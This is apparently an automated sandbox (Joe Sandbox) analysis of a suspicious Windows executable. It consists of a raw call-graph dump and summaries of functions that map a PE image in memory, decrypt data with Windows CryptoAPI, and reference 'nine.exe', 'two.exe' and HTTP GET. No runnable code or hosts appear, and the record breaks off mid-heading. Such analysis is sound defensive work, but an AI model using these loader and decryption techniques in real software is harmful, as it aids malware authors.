53158->53163 53493 4084c0 39 API calls 2 library calls 53159->53493 53165 406ed3 53161->53165 53162 406c9e 53171 4022c0 27 API calls 53162->53171 53498 408650 39 API calls 2 library calls 53163->53498 53165->52947 53502 4087d0 39 API calls 2 library calls 53165->53502 53167 406dfd 53173 4022c0 27 API calls 53167->53173 53169 406e82 53175 4022c0 27 API calls 53169->53175 53170 406edc 53177 4022c0 27 API calls 53170->53177 53172 406cae 53171->53172 53182 4021f0 25 API calls 53172->53182 53176 406e0d 53173->53176 53174 40710a Sleep 53174->53197 53178 406e92 53175->53178 53494 402240 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 53176->53494 53181 406eec 53177->53181 53499 402240 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 53178->53499 53180 406e16 53185 4021f0 25 API calls 53180->53185 53503 402240 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 53181->53503 53187 406cc2 53182->53187 53184 406e9b 53189 4021f0 25 API calls 53184->53189 53185->52947 53187->52947 53480 408090 39 API calls 2 library calls 53187->53480 53188 4022c0 27 API calls 53188->53197 53191 406ea3 53189->53191 53190 406ef5 53192 4021f0 25 API calls 53190->53192 53500 4086d0 39 API calls 2 library calls 53191->53500 53195 406efd 53192->53195 53504 408850 39 API calls 2 library calls 53195->53504 53197->53174 53197->53188 53198 407113 53197->53198 53202 407102 53197->53202 53199 4021f0 25 API calls 53198->53199 53201 40711b 53199->53201 53200 406f02 53208 4022c0 27 API calls 53200->53208 53204 40a850 27 API calls 53201->53204 53205 4021f0 25 API calls 53202->53205 53203 406ea8 53206 4022c0 27 API calls 53203->53206 53207 40712f 53204->53207 53205->53174 53206->53032 53210 40a850 27 API calls 53207->53210 53209 406f12 53208->53209 53505 402240 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 53209->53505 53212 407148 53210->53212 53214 40a850 27 API calls 53212->53214 53213 406f1b 53215 4021f0 25 API calls 53213->53215 53218 40715b 53214->53218 53216 406f23 53215->53216 53506 4088d0 39 API calls 2 library calls 53216->53506 53219 40a850 27 API calls 53218->53219 53221 40718b 53218->53221 53219->53221 53509 408b00 39 API calls 2 library calls 53221->53509 53222 407198 53223 4022c0 27 API calls 53222->53223 53224 4071a8 53223->53224 53225 4021f0 25 API calls 53224->53225 53226 4071bc 53225->53226 53227 407260 53226->53227 53228 401670 27 API calls 53226->53228 53512 408c70 39 API calls 2 library calls 53227->53512 53230 4071d7 53228->53230 53510 408b90 39 API calls 2 library calls 53230->53510 53231 407265 53234 4022c0 27 API calls 53231->53234 53233 4071e0 53236 4022c0 27 API calls 53233->53236 53235 407278 53234->53235 53237 4021f0 25 API calls 53235->53237 53240 4071f0 53236->53240 53238 40728f 53237->53238 53239 4072ef 53238->53239 53513 408de0 39 API calls 2 library calls 53238->53513 53242 4045e0 23 API calls 53239->53242 53245 407227 53240->53245 53246 407218 Sleep 53240->53246 53244 407300 53242->53244 53243 4072a0 53249 4022c0 27 API calls 53243->53249 53250 4022c0 27 API calls 53245->53250 53246->53240 53247 407225 53246->53247 53248 407249 53247->53248 53251 4021f0 25 API calls 53248->53251 53252 4072af 53249->53252 53253 40723e 53250->53253 53254 407251 53251->53254 53514 408d60 39 API calls 2 library calls 53252->53514 53256 4021f0 25 API calls 53253->53256 53511 4016d0 CoUninitialize 53254->53511 53256->53248 53258 4072c3 53259 4022c0 27 API calls 53258->53259 53260 4072d2 53259->53260 53515 408d00 39 API calls __Init_thread_footer 53260->53515 53262 4072e0 53263 4022c0 27 API calls 53262->53263 53263->53239 53265 40a87b 53264->53265 53266 40a882 53265->53266 53267 40a8d4 53265->53267 53268 40a8b5 53265->53268 53266->52722 53275 40a8c9 _Yarn 53267->53275 53621 4015c0 27 API calls 4 library calls 53267->53621 53269 40a90a 53268->53269 53270 40a8bc 53268->53270 53622 4015c0 27 API calls 2 library calls 53269->53622 53620 4015c0 27 API calls 4 library calls 53270->53620 53274 40a8c2 53274->53275 53276 411337 25 API calls 53274->53276 53275->52722 53277 40a914 53276->53277 53623 409bf0 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 53277->53623 53279 40a92b std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 53279->52722 53280->52722 53281->52746 53282->52758 53283->52752 53284->52781 53285->52762 53286->52772 53287->52765 53288->52781 53289->52728 53290->52738 53291->52731 53292->52753 53293->52747 53294->52766 53296 404171 53295->53296 53297 404169 53295->53297 53296->52807 53299 404180 53297->53299 53313 40e393 RaiseException 53297->53313 53314 40e393 RaiseException 53299->53314 53301 4041bf 53315 40e131 26 API calls 3 library calls 53301->53315 53303 4041e4 53303->52807 53304->52809 53305->52811 53306->52814 53307->52817 53308->52819 53309->52830 53310->52823 53312->52830 53313->53299 53314->53301 53315->53303 53317 40bf70 53316->53317 53318 40bf42 53316->53318 53322 40bf7c 53317->53322 53324 40bfa0 27 API calls 53317->53324 53319 404150 27 API calls 53318->53319 53320 40bf5c 53319->53320 53320->52841 53322->52841 53323->52841 53324->53322 53326 414f3c __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 53325->53326 53326->52844 53516 418e23 GetLastError 53327->53516 53331 414ee8 53330->53331 53333 414ef2 53330->53333 53554 414dd6 41 API calls 2 library calls 53331->53554 53333->52875 53335 404491 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 53334->53335 53336 40a850 27 API calls 53335->53336 53337 404515 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 53335->53337 53342 4045d7 53335->53342 53336->53335 53337->53342 53343 404571 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 53337->53343 53555 40b620 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 53337->53555 53338 40cd83 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 53340 4045d3 53338->53340 53340->52875 53341 40452d 53341->53342 53341->53343 53344 411337 25 API calls 53342->53344 53343->53338 53345 4045dc 53344->53345 53347 40b988 53346->53347 53350 40b91a _Yarn 53346->53350 53556 40bd10 27 API calls 4 library calls 53347->53556 53349 40b99a 53349->52875 53350->52875 53352 401d72 53351->53352 53352->53352 53353 402460 27 API calls 53352->53353 53354 401d85 53353->53354 53355 402460 27 API calls 53354->53355 53356 401e4d _Yarn 53355->53356 53557 411414 53356->53557 53359 401f83 53360 401ff3 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 53359->53360 53362 402022 53359->53362 53361 40cd83 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 53360->53361 53363 402017 53361->53363 53364 411337 25 API calls 53362->53364 53363->52875 53365 402027 53364->53365 53366 401d20 39 API calls 53365->53366 53368 40736e 53367->53368 53369 40733c 53367->53369 53370 40cd83 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 53368->53370 53586 40d10c 6 API calls 53369->53586 53372 407380 53370->53372 53372->52856 53373 407346 53373->53368 53587 40d41e 28 API calls 53373->53587 53375 407364 53588 40d0c2 EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 53375->53588 53378 4022e3 53377->53378 53379 402460 27 API calls 53378->53379 53380 4022f5 53379->53380 53380->52859 53382 4021fb 53381->53382 53383 402216 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 53381->53383 53382->53383 53384 411337 25 API calls 53382->53384 53383->52863 53385 40223a 53384->53385 53386 402271 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 53385->53386 53387 411337 25 API calls 53385->53387 53386->52863 53388 4022bc 53387->53388 53390 401683 __FrameHandler3::FrameUnwindToState 53389->53390 53391 40cfd1 27 API calls 53390->53391 53392 40169a __FrameHandler3::FrameUnwindToState 53391->53392 53392->52958 53394 408aa2 53393->53394 53402 408ade 53393->53402 53589 40d10c 6 API calls 53394->53589 53395 40cd83 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 53397 408af0 53395->53397 53397->52966 53398 408aac 53398->53402 53590 40d41e 28 API calls 53398->53590 53400 408ad4 53591 40d0c2 EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 53400->53591 53402->53395 53404 408a1c 53403->53404 53412 408a4e 53403->53412 53592 40d10c 6 API calls 53404->53592 53405 40cd83 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 53407 408a60 53405->53407 53407->52985 53408 408a26 53408->53412 53593 40d41e 28 API calls 53408->53593 53410 408a44 53594 40d0c2 EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 53410->53594 53412->53405 53414 4089d2 53413->53414 53415 40898d 53413->53415 53417 40cd83 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 53414->53417 53595 40d10c 6 API calls 53415->53595 53419 4089e5 53417->53419 53418 408997 53418->53414 53596 40d41e 28 API calls 53418->53596 53419->53006 53421 4089c8 53597 40d0c2 EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 53421->53597 53424 40ad12 53423->53424 53425 40b900 27 API calls 53424->53425 53426 406fda 53425->53426 53427 40ad60 53426->53427 53428 40ad79 53427->53428 53429 40ad8d _Yarn 53428->53429 53598 402730 27 API calls 4 library calls 53428->53598 53429->53046 53599 40b720 53431->53599 53433 407007 53433->53066 53434->52875 53435->52875 53436->52875 53438 414d8d 23 API calls 53437->53438 53439 4045e7 53438->53439 53440->52892 53442->52876 53443->52894 53444->52914 53445->52930 53446->52947 53447->52878 53448->52897 53449->52912 53450->52933 53451->52947 53452->52869 53453->52907 53454->52923 53455->52939 53456->52959 53457->52973 53458->53013 53459->53012 53460->53013 53461->52908 53462->52944 53463->52963 53464->52975 53465->52993 53466->53016 53467->53013 53468->53071 53469->52936 53470->52945 53471->52979 53472->52999 53473->53020 53474->53044 53475->53070 53476->53096 53477->53112 53478->53156 53479->53162 53480->52972 53481->52978 53482->53023 53483->53048 53484->53075 53485->53101 53486->53118 53487->53144 53488->53022 53489->53079 53490->53105 53491->53123 53492->53150 53493->53167 53494->53180 53495->53078 53496->53127 53497->53154 53498->53169 53499->53184 53500->53203 53501->53129 53502->53170 53503->53190 53504->53200 53505->53213 53506->53203 53507->53047 53508->52949 53509->53222 53510->53233 53512->53231 53513->53243 53514->53258 53515->53262 53517 418e40 53516->53517 53518 418e3a 53516->53518 53522 418e46 SetLastError 53517->53522 53547 419bb2 6 API calls std::_Lockit::_Lockit 53517->53547 53546 419b73 6 API calls std::_Lockit::_Lockit 53518->53546 53521 418e5e 53521->53522 53523 418e62 53521->53523 53529 406428 Sleep 53522->53529 53530 418eda 53522->53530 53548 41968b 14 API calls 3 library calls 53523->53548 53525 418e6e 53527 418e76 53525->53527 53528 418e8d 53525->53528 53549 419bb2 6 API calls std::_Lockit::_Lockit 53527->53549 53550 419bb2 6 API calls std::_Lockit::_Lockit 53528->53550 53529->52847 53553 4160b9 37 API calls __FrameHandler3::FrameUnwindToState 53530->53553 53535 418e99 53537 418e9d 53535->53537 53538 418eae 53535->53538 53536 418e84 53539 4196e8 _free 14 API calls 53536->53539 53551 419bb2 6 API calls std::_Lockit::_Lockit 53537->53551 53552 418c51 14 API calls __Getctype 53538->53552 53542 418e8a 53539->53542 53542->53522 53543 418eb9 53544 4196e8 _free 14 API calls 53543->53544 53545 418ec0 53544->53545 53545->53522 53546->53517 53547->53521 53548->53525 53549->53536 53550->53535 53551->53536 53552->53543 53554->53333 53555->53341 53556->53349 53560 419075 53557->53560 53564 419089 53560->53564 53561 41908d 53562 401e98 InternetOpenA 53561->53562 53579 411401 14 API calls __dosmaperr 53561->53579 53562->53359 53564->53561 53564->53562 53566 4190c7 53564->53566 53565 4190b7 53580 411327 25 API calls _mbstowcs 53565->53580 53581 411431 37 API calls 2 library calls 53566->53581 53569 4190d3 53570 4190dd 53569->53570 53573 4190f4 53569->53573 53582 421f0d 25 API calls 2 library calls 53570->53582 53572 419176 53572->53562 53583 411401 14 API calls __dosmaperr 53572->53583 53573->53572 53574 4191cb 53573->53574 53574->53562 53585 411401 14 API calls __dosmaperr 53574->53585 53577 4191bf 53584 411327 25 API calls _mbstowcs 53577->53584 53579->53565 53580->53562 53581->53569 53582->53562 53583->53577 53584->53562 53585->53562 53586->53373 53587->53375 53588->53368 53589->53398 53590->53400 53591->53402 53592->53408 53593->53410 53594->53412 53595->53418 53596->53421 53597->53414 53598->53429 53600 40b763 53599->53600 53601 40b8f0 53600->53601 53602 40b830 53600->53602 53608 40b768 _Yarn 53600->53608 53618 401660 27 API calls 53601->53618 53606 40b865 53602->53606 53607 40b88b 53602->53607 53604 40b8f5 53619 4015c0 27 API calls 2 library calls 53604->53619 53606->53604 53610 40b870 53606->53610 53615 40b87d _Yarn 53607->53615 53617 4015c0 27 API calls 4 library calls 53607->53617 53608->53433 53609 40b876 53612 411337 25 API calls 53609->53612 53609->53615 53616 4015c0 27 API calls 4 library calls 53610->53616 53614 40b8ff 53612->53614 53615->53433 53616->53609 53617->53615 53619->53609 53620->53274 53621->53275 53622->53274 53623->53279 53625 414c39 53624->53625 53626 414c4b 53624->53626 53652 40d906 GetModuleHandleW 53625->53652 53636 414ad2 53626->53636 53629 414c3e 53629->53626 53653 414cd1 GetModuleHandleExW 53629->53653 53631 40d66b 53631->52790 53635 414c8e 53637 414ade __FrameHandler3::FrameUnwindToState 53636->53637 53659 414fa9 EnterCriticalSection 53637->53659 53639 414ae8 53660 414b3e 53639->53660 53641 414af5 53664 414b13 53641->53664 53644 414c8f 53669 41b919 GetPEB 53644->53669 53647 414cbe 53650 414cd1 __FrameHandler3::FrameUnwindToState 3 API calls 53647->53650 53648 414c9e GetPEB 53648->53647 53649 414cae GetCurrentProcess TerminateProcess 53648->53649 53649->53647 53651 414cc6 ExitProcess 53650->53651 53652->53629 53654 414cf0 GetProcAddress 53653->53654 53655 414d13 53653->53655 53658 414d05 53654->53658 53656 414c4a 53655->53656 53657 414d19 FreeLibrary 53655->53657 53656->53626 53657->53656 53658->53655 53659->53639 53661 414b4a __FrameHandler3::FrameUnwindToState 53660->53661 53662 414bab __FrameHandler3::FrameUnwindToState 53661->53662 53667 416f1d 14 API calls __FrameHandler3::FrameUnwindToState 53661->53667 53662->53641 53668 414ff1 LeaveCriticalSection 53664->53668 53666 414b01 53666->53631 53666->53644 53667->53662 53668->53666 53670 41b933 53669->53670 53671 414c99 53669->53671 53673 419a42 5 API calls std::_Lockit::_Lockit 53670->53673 53671->53647 53671->53648 53673->53671 53674 66003c 53675 660049 53674->53675 53689 660e0f SetErrorMode SetErrorMode 53675->53689 53680 660265 53681 6602ce VirtualProtect 53680->53681 53682 66030b 53681->53682 53683 660439 VirtualFree 53682->53683 53687 6605f4 LoadLibraryA 53683->53687 53688 6604be 53683->53688 53684 6604e3 LoadLibraryA 53684->53688 53686 6608c7 53687->53686 53688->53684 53688->53687 53690 660223 53689->53690 53691 660d90 53690->53691 53692 660dad 53691->53692 53693 660238 VirtualAlloc 53692->53693 53694 660dbb GetPEB 53692->53694 53693->53680 53694->53693

                                                  Executed Functions

                                                  Function 00402C60 Relevance: 40.8, APIs: 11, Strings: 12, Instructions: 504COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 0 402c60-402c82 1 402c84-402cab SetLastError call 402910 call 40cd83 0->1 2 402cac-402cb4 0->2 3 402ce1-402cef 2->3 4 402cb6 2->4 7 402cf1-402d18 SetLastError call 402910 call 40cd83 3->7 8 402d19-402d26 3->8 6 402cbb-402ce0 call 402910 SetLastError call 40cd83 4->6 10 402d28-402d2d 8->10 11 402d2f-402d38 8->11 10->6 16 402d44-402d4a 11->16 17 402d3a-402d3f 11->17 20 402d56-402d63 16->20 21 402d4c-402d51 16->21 17->6 24 402d84-402da7 GetNativeSystemInfo 20->24 25 402d65 20->25 21->6 29 402db3-402dcb VirtualAlloc 24->29 30 402da9-402dae 24->30 28 402d67-402d82 25->28 28->24 28->28 31 402df3-402e0e GetProcessHeap HeapAlloc 29->31 32 402dcd-402ddd VirtualAlloc 29->32 30->6 33 402e10-402e1d VirtualFree 31->33 34 402e24-402e6a 31->34 32->31 35 402ddf-402dec call 402910 32->35 33->34 36 402e6c-402e6e SetLastError 34->36 37 402e8e-402ed6 VirtualAlloc call 40e400 34->37 35->31 39 402e74-402e8d call 4033c0 call 40cd83 36->39 45 402edc-402edf 37->45 46 402f8f-402f98 37->46 50 402ee0-402ee5 45->50 47 40301d 46->47 48 402f9e-402fa5 46->48 54 403022-40302e call 402a70 47->54 51 402fa7-402fa9 48->51 52 402fab-402fbd 48->52 55 402ee7-402ef3 50->55 56 402f28-402f30 50->56 51->54 52->47 59 402fbf 52->59 54->39 65 403034-403057 54->65 57 402f74-402f86 55->57 58 402ef5-402f0f 55->58 56->36 60 402f36-402f49 call 402be0 56->60 57->50 63 402f8c 57->63 58->39 72 402f15-402f26 call 40ea40 58->72 62 402fc0-402fd5 59->62 69 402f4b-402f50 60->69 67 402fd7-402fda 62->67 68 40300e-403018 62->68 63->46 70 403059-40305e 65->70 71 40306c-40308c 65->71 73 402fe0-402ff1 67->73 68->62 75 40301a 68->75 69->39 74 402f56-402f6b call 40e400 69->74 76 403060-403063 70->76 77 403065-403067 70->77 79 403092-403098 71->79 80 403155-403161 call 402940 71->80 89 402f6e-402f71 72->89 81 402ff3-402ffb 73->81 82 402ffe-40300c 73->82 74->89 75->47 76->71 77->71 84 403069 77->84 86 4030a0-4030b9 79->86 92 403166-403168 80->92 81->82 82->68 82->73 84->71 90 4030d3-4030d6 86->90 91 4030bb-4030be 86->91 89->57 96 403113-40311f 90->96 97 4030d8-4030df 90->97 93 4030c0-4030c3 91->93 94 4030c5-4030c8 91->94 92->39 95 40316e-40317a 92->95 100 4030cd-4030d0 93->100 94->90 101 4030ca 94->101 102 4031a3-4031a8 95->102 103 40317c-403185 95->103 98 403121 96->98 99 403127-403130 96->99 104 403110 97->104 105 4030e1-4030e6 call 402940 97->105 98->99 109 403133-40314f 99->109 100->90 101->100 107 4031fa-403213 call 40cd83 102->107 108 4031aa-4031b3 102->108 103->102 110 403187-40318b 103->110 104->96 111 4030eb-4030ed 105->111 113 4031e4-4031f9 call 40cd83 108->113 114 4031b5-4031be 108->114 109->80 109->86 110->102 115 40318d 110->115 111->39 116 4030f3-40310e 111->116 123 4031c0 114->123 124 4031ca-4031e3 call 40cd83 114->124 119 403190-40319f 115->119 116->109 125 4031a1 119->125 123->124 125->102
                                                  APIs
                                                  • SetLastError.KERNEL32(0000000D), ref: 00402C86
                                                  • SetLastError.KERNEL32(000000C1), ref: 00402CC8
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast
                                                  • String ID: ,@$ ,@$@$DOS header is not valid!$DOS header size is not valid!$ERROR_OUTOFMEMORY!$FileHeader.Machine != HOST_MACHINE!$P,@0,@ ,@$Section alignment invalid!$Signature != IMAGE_NT_SIGNATURE!$Size is not valid!$alignedImageSize != AlignValueUp!
                                                  • API String ID: 1452528299-90842840
                                                  • Opcode ID: a8622f64d8070585d512a72ec777aab289d6801d447c326e6b8095fd7aed850a
                                                  • Instruction ID: d1ae0cd5652749efb72fafdd6d36f3c4f1fa47aae7819869a3385d061891a2f5
                                                  • Opcode Fuzzy Hash: a8622f64d8070585d512a72ec777aab289d6801d447c326e6b8095fd7aed850a
                                                  • Instruction Fuzzy Hash: E112AB71A012059BDB14CFA9D984BAEB7B5BF48304F14417AE809BB3C5D7B8ED41CB98
                                                  Function 004034B0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 232encryptionCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 810 4034b0-403538 CryptAcquireContextW 811 4035fa-403610 GetLastError CryptReleaseContext 810->811 812 40353e-40355c CryptCreateHash 810->812 813 403744-40374a 811->813 812->811 814 403562-403575 812->814 816 403774-403791 call 40cd83 813->816 817 40374c-403758 813->817 815 403578-40357d 814->815 815->815 818 40357f-4035c6 call 40cfd1 call 41366b CryptHashData 815->818 820 40376a-403771 call 40cfc3 817->820 821 40375a-403768 817->821 833 4035d6-4035f8 CryptDeriveKey 818->833 834 4035c8-4035d1 GetLastError 818->834 820->816 821->820 824 403792-4037d0 call 411337 call 40e131 821->824 833->811 836 403615-403616 call 4133dd 833->836 834->813 838 40361b-403667 call 40e400 call 40cfd1 836->838 843 403738-40373e CryptDestroyKey 838->843 844 40366d-40367c 838->844 843->813 845 403682-40368b 844->845 846 403699-4036d4 call 40e400 CryptDecrypt 845->846 847 40368d-40368f 845->847 846->843 850 4036d6-403701 call 40e400 846->850 847->846 850->843 853 403703-403732 850->853 853->843 853->845
                                                  APIs
                                                  • CryptAcquireContextW.ADVAPI32(?,00000000,?,00000018,F0000000,5BDF3532), ref: 00403530
                                                  • CryptCreateHash.ADVAPI32(?,0000800C,00000000,00000000,?), ref: 00403554
                                                  • _mbstowcs.LIBCMT ref: 004035A7
                                                  • CryptHashData.ADVAPI32(?,00000000,?,00000000), ref: 004035BE
                                                  • GetLastError.KERNEL32 ref: 004035C8
                                                  • CryptDeriveKey.ADVAPI32(?,0000660E,?,00000000,?), ref: 004035F0
                                                  • GetLastError.KERNEL32 ref: 004035FA
                                                  • CryptReleaseContext.ADVAPI32(?,00000000), ref: 0040360A
                                                  • CryptDecrypt.ADVAPI32(?,00000000,00000000,00000000,?,00000000), ref: 004036CC
                                                  • CryptDestroyKey.ADVAPI32(?), ref: 0040373E
                                                  • ___std_exception_copy.LIBVCRUNTIME ref: 004037BE
                                                  Strings
                                                  • Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 0040350C, 004037A3
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: Crypt$ContextErrorHashLast$AcquireCreateDataDecryptDeriveDestroyRelease___std_exception_copy_mbstowcs
                                                  • String ID: Microsoft Enhanced RSA and AES Cryptographic Provider
                                                  • API String ID: 4265767208-63410773
                                                  • Opcode ID: 7b998e777f9dba12feb14bf4fe2aca7bea4611c124f2976cea3106fcf7bfb3b9
                                                  • Instruction ID: 95a2a36aee1ec4de7b2520a7f89bd3df41077e598d0595e4efdc36d1890455ca
                                                  • Opcode Fuzzy Hash: 7b998e777f9dba12feb14bf4fe2aca7bea4611c124f2976cea3106fcf7bfb3b9
                                                  • Instruction Fuzzy Hash: 898193B1A00218AFEB208F25CC45B9EBBB9EF45310F4081BAF54DE7291DB359E858F55
                                                  Function 00408E60 Relevance: 19.9, APIs: 5, Strings: 6, Instructions: 601COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 904 408e60-408ec3 905 408ec6-408ecb 904->905 905->905 906 408ecd-408f5f call 402460 call 40ea40 call 409fc0 call 40b9b0 905->906 915 408f61-408f74 906->915 916 408fb3-408fd0 906->916 917 408f86-408f8d call 40b220 915->917 918 408f76-408f84 call 40a850 915->918 919 408fd6-409007 GetModuleFileNameA 916->919 920 4093fe-409401 916->920 929 408f92-408fb1 call 40b9b0 917->929 918->929 925 409011-409016 919->925 921 409407-40942d 920->921 922 40956b-40959b call 40a850 * 2 call 4063d0 920->922 926 409477-40947e 921->926 927 40942f-409443 call 40d10c 921->927 958 4095cc-409659 call 409bf0 call 40c763 call 40a580 922->958 959 40959d-4095ac 922->959 925->925 931 409018-40905c call 402460 call 402640 925->931 934 409480-4094a5 926->934 935 4094aa-4094cd 926->935 927->926 943 409445-409474 call 40d41e call 40d0c2 927->943 929->915 929->916 951 409062-409089 931->951 952 4091e7-409210 call 402640 931->952 934->935 940 4094d0-4094d5 935->940 940->940 944 4094d7-4094f6 call 402460 940->944 943->926 956 4094f8-40951c 944->956 957 40951e-40953a call 40b040 944->957 960 4090d2-4090d9 951->960 961 40908b-40909f call 40d10c 951->961 979 409216-40923d 952->979 980 40936f-4093b9 call 402460 * 2 call 4063d0 952->980 956->922 957->922 982 40953c-40954b 957->982 1026 409686-4096a2 call 40cd83 958->1026 1027 40965b-40966a 958->1027 964 4095c2-4095c9 call 40cfc3 959->964 965 4095ae-4095bc 959->965 970 409113-409139 960->970 971 4090db-40910e 960->971 961->960 983 4090a1-4090cf call 40d41e call 40d0c2 961->983 964->958 965->964 973 4096aa-4096ee call 411337 965->973 978 409140-409145 970->978 971->970 1015 4096f0-4096f2 973->1015 1016 4096f4-4096fb 973->1016 978->978 987 409147-409166 call 402460 978->987 988 409286-40928d 979->988 989 40923f-409253 call 40d10c 979->989 1031 4093be 980->1031 990 409561-409568 call 40cfc3 982->990 991 40954d-40955b 982->991 983->960 1008 409191-4091ad call 40b040 987->1008 1009 409168-40918c 987->1009 994 4092c7-4092ed 988->994 995 40928f-4092c2 988->995 989->988 1010 409255-409283 call 40d41e call 40d0c2 989->1010 990->922 991->973 991->990 1003 4092f0-4092f5 994->1003 995->994 1003->1003 1014 4092f7-409316 call 402460 1003->1014 1018 4093c1-4093ca 1008->1018 1041 4091b3-4091c2 1008->1041 1009->1018 1010->988 1014->1009 1042 40931c-409338 call 40b040 1014->1042 1024 409705-40971c 1015->1024 1016->1024 1025 4096fd-409700 1016->1025 1018->922 1033 4093d0-4093df 1018->1033 1034 4097a2-4097a8 1024->1034 1035 409722 1024->1035 1025->1024 1036 409702 1025->1036 1037 40967c-409683 call 40cfc3 1027->1037 1038 40966c-40967a 1027->1038 1031->1018 1033->990 1044 4093e5-4093f3 1033->1044 1043 4097af-4097cd 1034->1043 1045 409724-409726 1035->1045 1046 409728-409731 1035->1046 1036->1024 1037->1026 1038->973 1038->1037 1050 4091c4-4091d2 1041->1050 1051 4091d8-4091e2 call 40cfc3 1041->1051 1042->1018 1069 40933e-40934d 1042->1069 1053 4096a5 call 411337 1044->1053 1054 4093f9 1044->1054 1045->1034 1045->1046 1055 409733-409736 1046->1055 1056 409748-409751 1046->1056 1050->1051 1050->1053 1051->1018 1053->973 1054->990 1057 409738-40973d 1055->1057 1058 40973f-409742 1055->1058 1059 409753-409758 1056->1059 1060 40976d-409770 1056->1060 1057->1034 1057->1058 1058->1056 1064 409744-409746 1058->1064 1059->1060 1065 40975a-40976a 1059->1065 1066 409772-409774 1060->1066 1067 409797-4097a0 1060->1067 1064->1034 1064->1056 1065->1060 1066->1067 1072 409776-409795 1066->1072 1067->1043 1070 409363-40936d call 40cfc3 1069->1070 1071 40934f-40935d 1069->1071 1070->1018 1071->1053 1071->1070 1072->1067
                                                  APIs
                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00408FE4
                                                  • __Init_thread_footer.LIBCMT ref: 0040927E
                                                  • __Init_thread_footer.LIBCMT ref: 004090CA
                                                    • Part of subcall function 0040D0C2: EnterCriticalSection.KERNEL32(004383D4,?,?,00401082,00438EBC,00426B90), ref: 0040D0CC
                                                    • Part of subcall function 0040D0C2: LeaveCriticalSection.KERNEL32(004383D4,?,?,00401082,00438EBC,00426B90), ref: 0040D0FF
                                                    • Part of subcall function 0040D0C2: RtlWakeAllConditionVariable.NTDLL ref: 0040D176
                                                  • __Init_thread_footer.LIBCMT ref: 0040946F
                                                  • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 0040963D
                                                    • Part of subcall function 0040D10C: EnterCriticalSection.KERNEL32(004383D4,?,?,?,00401047,00438EBC), ref: 0040D117
                                                    • Part of subcall function 0040D10C: LeaveCriticalSection.KERNEL32(004383D4,?,?,?,00401047,00438EBC), ref: 0040D154
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: CriticalSection$Init_thread_footer$EnterLeave$ConditionFileIos_base_dtorModuleNameVariableWakestd::ios_base::_
                                                  • String ID: GET$NOSUB$ZYA.$kc~z$nine.exe$two.exe
                                                  • API String ID: 2716318523-155817423
                                                  • Opcode ID: c88f92c882b648590cba2f2499e70da6b29ef9d5d5b97d2e5ff23a0a3304e30a
                                                  • Instruction ID: b8017e68b8cd19ffbf6244ec68e5bce9a373ae63186eb1a6feb7d55068310508
                                                  • Opcode Fuzzy Hash: c88f92c882b648590cba2f2499e70da6b29ef9d5d5b97d2e5ff23a0a3304e30a
                                                  • Instruction Fuzzy Hash: 0942F5719103049BDB14DF28DD89BAAB7B1BB49304F1042EEE449673D2DB79AE84CF49
                                                  Function 00402940 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 113memorywindowCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
